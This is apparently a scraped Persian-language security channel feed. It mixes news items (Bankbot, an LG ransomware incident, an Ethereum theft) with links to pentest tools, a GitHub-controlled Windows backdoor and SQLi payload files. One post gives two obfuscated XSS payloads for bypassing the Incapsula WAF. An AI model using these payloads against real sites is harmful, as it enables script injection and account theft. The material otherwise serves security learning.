دور زدن محدودیت آپلود فایل با حقه Double Extension
https://infosecaddicts.com/file-upload-vulnerability/
#web
#pentest
#shell
https://infosecaddicts.com/file-upload-vulnerability/
#web
#pentest
#shell
این ریپوزیتوری لینوکس کالی شمارو به دستگاهی تبدیل میکنه که تمام ترافیک عبوری رو با وایرشارک ضبط کرده و ترافیک مرتبط به وب با پروتکل های HTTP و HTTPS رو برای بازرسی به پروکسی بازرسی کننده مانند BurpSuite که بر روی سیستم عامل دیگه ای در حال اجرا هست ارسال میکنه.
https://github.com/koenbuyens/kalirouter
#interception
#hijack
#network
#kali
#sniff
#wireshark
https://github.com/koenbuyens/kalirouter
#interception
#hijack
#network
#kali
#sniff
#wireshark
GitHub
GitHub - koenbuyens/kalirouter: intercepting kali router
intercepting kali router. Contribute to koenbuyens/kalirouter development by creating an account on GitHub.
CanisRufus
بکدور پایتونی برای ویندوز که از گیت هاب به عنوان C&C استفاده میکند
https://github.com/maldevel/canisrufus
#python
#backdoor
#windwos
بکدور پایتونی برای ویندوز که از گیت هاب به عنوان C&C استفاده میکند
https://github.com/maldevel/canisrufus
#python
#backdoor
#windwos
GitHub
GitHub - maldevel/canisrufus: A stealthy Python based Windows backdoor that uses Github as a command and control server
A stealthy Python based Windows backdoor that uses Github as a command and control server - maldevel/canisrufus
دراپر تروجان بانکی با نام Bankbot توسط بعضی برنامه های موجود در گوگل پلی در گوشی کاربران نصب شده!
https://tinyurl.com/yaklfxdw
#android
#trojan
#google
https://tinyurl.com/yaklfxdw
#android
#trojan
ال جی کره مجددا مورد حمله سایبری قرار گرفت.
سرویس اینترنت و امنیت کره جنوبی گزارشی از شرکت ال جی مبنی بر حمله بدافزاری که شبیه به WannaCry بوده دریافت کرده.اما این موضوع کاملا تایید نشده است.
بعد از ایجاد تاخیر در برخی از سرویس های آنلاین این شرکت، کارشناسان این شرکت با کشف کدهای مخرب اقدام به خاموش کردن تعدادی از دستگاه های آلوده کردند.
هوشیاری کارشناسان باعث شده باج افزار موفق یه رمزنگاری داده ها نشه و جلوی حمله و ضرر رو به سرعت گرفتن.
#news
#lg
#wannacry
#ransomware
سرویس اینترنت و امنیت کره جنوبی گزارشی از شرکت ال جی مبنی بر حمله بدافزاری که شبیه به WannaCry بوده دریافت کرده.اما این موضوع کاملا تایید نشده است.
بعد از ایجاد تاخیر در برخی از سرویس های آنلاین این شرکت، کارشناسان این شرکت با کشف کدهای مخرب اقدام به خاموش کردن تعدادی از دستگاه های آلوده کردند.
هوشیاری کارشناسان باعث شده باج افزار موفق یه رمزنگاری داده ها نشه و جلوی حمله و ضرر رو به سرعت گرفتن.
#news
#lg
#wannacry
#ransomware
توضیحاتی در مورد اقسام شبکه های عصبی
https://becominghuman.ai/cheat-sheets-for-ai-neural-networks-machine-learning-deep-learning-big-data-678c51b4b463
#AI
#machine_learning
https://becominghuman.ai/cheat-sheets-for-ai-neural-networks-machine-learning-deep-learning-big-data-678c51b4b463
#AI
#machine_learning
ابزار portia برای تست نفوذ شبکه های داخلی و بالا بردن سطح دسترسی بعد از تسخیر کاربری با سطح دسترسی پایین
https://github.com/SpiderLabs/portia
#pentest
#network
#privilege_escalate
https://github.com/SpiderLabs/portia
#pentest
#network
#privilege_escalate
SQL-Injection-Payloads-master.zip
8.2 KB
پیلود های SQLI برای استفاده در Burp Suite و OWASP Zed Attack Proxy
هکر ناشناسی با هک کردن Enigma موفق به سرقت Ethereum به ارزش 471 هزار دلار شد.
https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html
#cryptocurrency
#btc
#ethereum
https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html
#cryptocurrency
#btc
#ethereum
Security Affairs
Enigma platform hacked, hackers stole over $470,000 worth of Ethereum
Another cyber heist made the headlines, this time an unknown hacker has stolen more than $471,000 worth of Ethereum cryptocurrency.
NoSQLMap – Automated NoSQL Exploitation Tool
https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/
#nosql
#injection
#pentest
#web
#database
https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/
#nosql
#injection
#pentest
#web
#database
out-of-band-xml-external-entity-injection-via-saml-redacted.pdf
267.5 KB
Out of Band
XML External Entity Injection via SAML SSO
XML External Entity Injection via SAML SSO
اوراکل قصد داره سورس J2E رو باز کنه!
https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html
https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
1) <iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
آموزش محدود کردن دسترسی کاربران در لینوکس
https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine
#linux
https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine
#linux
LinuxConfig
How to restrict users access on a Linux machine
Learn how to restrict users access on a Linux machine EASY In this tutorial we are going to learn how to restrict access to a Linux machine by interacting with two files: , which let us specify from…
ماشین حساب ویندوز از اینترنت استفاده میکند!
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.
https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator
#windows
#malware
این دسترسی ظاهرا برای به روزرسانی نرخ ارز هست.
https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator
#windows
#malware
کشف و اکسپلویت کردن باگ SQL Injection
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
#sqli
#web
#pentest
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
#sqli
#web
#pentest